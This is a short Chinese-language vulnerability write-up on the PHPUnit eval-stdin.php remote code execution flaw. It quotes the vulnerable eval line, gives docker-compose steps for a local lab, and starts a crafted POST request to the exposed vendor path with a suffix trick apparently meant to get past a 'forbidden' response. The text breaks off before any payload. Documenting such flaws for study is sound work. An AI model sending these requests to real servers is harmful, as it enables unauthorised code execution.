漏洞简介
composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。通常这个目录需要放在web目录外,使用户不能直接访问。
phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
文件有如下代码:
eval('?>'.file_get_contents('php://input'));
如果该文件被用户直接访问到,将造成远程代码执行漏洞。
漏洞复现
执行如下命令启动一个php环境,其中phpunit被安装在web目录下。
docker-compose build
docker-compose up -d
web环境将启动在http://127.0.0.1:8080/
。
虽然显示禁止访问,但通过抓包构造可造成代码执行
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpA HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0)<